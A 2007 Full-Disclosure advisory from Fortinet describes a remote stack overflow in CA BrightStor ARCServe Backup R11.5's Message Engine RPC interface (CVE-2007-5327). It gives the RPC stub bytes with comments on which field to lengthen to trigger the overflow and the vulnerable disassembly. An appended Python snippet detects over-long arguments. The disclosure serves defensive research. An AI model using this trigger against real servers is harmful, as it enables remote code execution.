Subject: [Full-disclosure] CA BrightStor ARCServe BackUp Message Engine Remote Stack Overflow Vulnerability
Date: Thu, 11 Oct 2007 15:29:43 +0800
hi full-disclosure,


CA BrightStor ARCServe BackUp Message Engine Remote Stack Overflow Vulnerability

by cocoruder of Fortinet Security Research Team
http://ruder.cdut.net


Summary:

    A remote stack overflow vulnerability exists in the RPC interface of CA 
BrightStor ARCServe BackUp. An arbitrary anonymous attacker can execute 
arbitrary code on the affected system by exploiting this vulnerability.


Affected Software Versions:

    CA BrightStor ARCServe BackUp R11.5



Details:
        
    The flaw specifically exists within the CA BrightStor Message Engine due to 
incorrect handling of RPC requests on TCP port 6504. The interface is 
identified by 506b1890-14c8-11d1-bbc3-00805fa6962e v1.0. Opnum 0x10d specifies 
the vulnerable operation within this interface.

    Function 0x10d's IDL is as follows:

        long   sub_28EA5F70 (
         [in] handle_t  arg_1,
         [in, out][size_is(256), length_is(1)] struct struct_2 * arg_2,
         [in][string] char * arg_3,
         [in][string] char * arg_4,
         [in][string] char * arg_5,
         [in][string] char * arg_6,
         [in][string] char * arg_7,
         [in] long  arg_8,
         [out][size_is(arg_1)] byte * arg_9
        );

    The following is the normal stub of this function:

        my $stub=
        "\x00\x01\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".

        "\x10\x00\x00\x00\x00\x00\x00\x00".                     #point1: the victim's computer name
        "\x10\x00\x00\x00".
        "kkk-49ade5b31c1".
        "\x00".
        
        "\x09\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00".     #point2: a string, set it long
        "Database".
        "\x00\x00\x00\x00".

        "\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
        "\x00\x00\x00\x00".
        
        "\x1a\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00".     
        "RemoteDatabaseMachineName".
        "\x00\x00\x00".
                
        "\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
        "\x00\x79\x49\x6e\x40\x00\x00\x00";


    When we set #point1 equal to the victim's computer name, and set #point2 to 
a long string, a stack-based overflow is triggered. The vulnerable code is as 
follows: 
        
        .text:25604EF8                 lea     edx, [esp+120h+SubKey]
        .text:25604EFC                 push    offset asc_2561E2BC      
        .text:25604F01                 push    edx                      ;
        .text:25604F02                 call    edi ; lstrcatA           ; 
        .text:25604F04                 lea     eax, [esp+120h+SubKey]
        .text:25604F08                 push    esi                      ;
        .text:25604F09                 push    eax                      
        .text:25604F0A                 call    edi ; lstrcatA           ; overflow!



Solution:

    CA has released an advisory for this vulnerability which is available on:

    http://supportconnectw.ca.com/public/storage/infodocs/basb-secnotice.asp

    Fortinet advisory can be found at:
    
    http://www.fortiguardcenter.com



CVE Information:

    CVE-2007-5327


Disclosure Timeline:

    2007.04.11        Vendor notified via email 
    2007.04.12        Vendor responded
    2007.10.11        Final public disclosure



Disclaimer:

    Although Fortinet has attempted to provide accurate information in
these materials, Fortinet assumes no legal responsibility for the
accuracy or completeness of the information. More specific information
is available on request from Fortinet. Please note that Fortinet's
product information does not constitute or contain any guarantee,
warranty or legally binding representation, unless expressly
identified as such in a duly signed writing.


Fortinet Security Research
secresearch@fortinet.com
http://www.fortinet.com


        

Best Regards,
                                

        Haifei Li
        hfli@fortinet.com
          2007-10-11
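As an added defensive example (not part of the advisory or of any CA or Fortinet code): a Python decoder for the NDR-encoded `[string] char *` arguments of the opnum 0x10d request laid out in the stub above, which flags a request whose arg_4 (#point2) exceeds a triage bound. It assumes the leading struct_2 array occupies 268 bytes on the wire (12-byte NDR header plus 256 bytes, as in the stub) and uses a constructed 64-byte bound; sample bodies are built inline.

```python
import struct

# Assumptions (not from the advisory): the [in,out] struct_2 array at the
# start of the opnum 0x10d stub is 268 bytes on the wire (12-byte NDR
# conformant/varying header + 256 bytes, as in the stub shown), and 64
# bytes is a conservative triage bound for arg_4 (the "Database" string).
STRUCT2_WIRE_LEN = 268
ARG4_TRIAGE_LIMIT = 64
STRUCT2_HDR = b"\x00\x01\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
TRAILER = b"\x00\x79\x49\x6e\x40\x00\x00\x00"  # arg_8 and out-size, as in the stub


def ndr_string(s: bytes) -> bytes:
    """Encode a NUL-terminated NDR conformant/varying string (helper for
    constructing samples): max count, offset 0, actual count, bytes, pad to 4."""
    data = s + b"\x00"
    return struct.pack("<III", len(data), 0, len(data)) + data + b"\x00" * ((-len(data)) % 4)


def read_ndr_string(buf: bytes, off: int):
    """Decode one NDR string at `off`; return (bytes without NUL, next offset)."""
    if off + 12 > len(buf):
        raise ValueError("truncated NDR string header")
    max_cnt, offset, actual = struct.unpack_from("<III", buf, off)
    off += 12
    if offset != 0 or actual > max_cnt or off + actual > len(buf):
        raise ValueError("inconsistent NDR string header")
    data = buf[off:off + actual]
    off += actual + (-actual) % 4  # next element is 4-byte aligned
    return data.rstrip(b"\x00"), off


def parse_0x10d_strings(buf: bytes) -> list:
    """Return arg_3 .. arg_7 of an opnum 0x10d request body."""
    off, out = STRUCT2_WIRE_LEN, []
    for _ in range(5):
        s, off = read_ndr_string(buf, off)
        out.append(s)
    return out


def check_request(buf: bytes, limit: int = ARG4_TRIAGE_LIMIT) -> dict:
    """Triage verdict: arg_4 longer than the bound is flagged as suspicious."""
    args = parse_0x10d_strings(buf)
    return {"arg3": args[0], "arg4_len": len(args[1]), "suspicious": len(args[1]) > limit}


def sample_body(arg4: bytes) -> bytes:
    """Constructed request body mirroring the advisory's stub, with arg_4 varied."""
    return (STRUCT2_HDR + b"\x00" * 256 + ndr_string(b"kkk-49ade5b31c1")
            + ndr_string(arg4) + ndr_string(b"") + ndr_string(b"RemoteDatabaseMachineName")
            + ndr_string(b"") + TRAILER)
```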
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/